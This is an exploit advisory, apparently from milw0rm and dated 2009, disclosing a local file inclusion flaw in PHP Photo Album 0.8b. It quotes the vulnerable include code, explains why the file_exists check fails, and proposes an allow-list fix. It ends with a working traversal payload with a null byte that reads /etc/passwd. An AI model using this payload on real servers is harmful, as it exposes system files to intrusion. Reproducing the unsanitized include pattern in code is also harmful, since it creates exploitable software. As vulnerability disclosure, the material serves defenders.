PHP Photo Album 0.8b - 'preview' Local File Inclusion

[START]

###################################################################################################################################
[0x01] Informations:

Script         : Php Photo Album 0.8 BETA
Download       : http://sourceforge.net/project/downloading.php?group_id=151573&use_mirror=kent&filename=PHPPA_.9_BETA.zip&37834145
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian


###################################################################################################################################
[0x02] Bug: [Local File Inclusion]
######

Bugged file is: /[path]/index.php

[CODE]

$skin_temp = $_GET['preview'];
if(isset($_GET['preview']) && file_exists("./skin/$skin_temp/config.php")){
	$skin = $_GET['preview'];
	}
else{
	$skin = vari("skin");
	}
require("./skin/$skin/config.php");

[/CODE]

If 'preview' from GET is provided, we can include it just bypassing a stupid cheek.
file_exists("./skin/$skin_temp/config.php) <-- this cheek is stupid, becouse when
we set a value to $skin_temp , if we set a local file with a directory trasversal
it's obvious that the file exists, so it will be included.

[!] FIX: Use another filter instead of file_exists("./skin/$skin_temp/config.php)
         Just filter $skin_temp before include it. A fix could be to declare $skin
         with a standard or local value, or just put the allowed values in an array,
         and cheek then if the skin provided is allowed. See is_in_array() function


[!] EXPLOIT: /[path]/index.php?preview=[local_file]%00
                                       ../../../../../../../../../../../../etc/passwd%00

###################################################################################################################################

[/END]

# milw0rm.com [2009-01-14]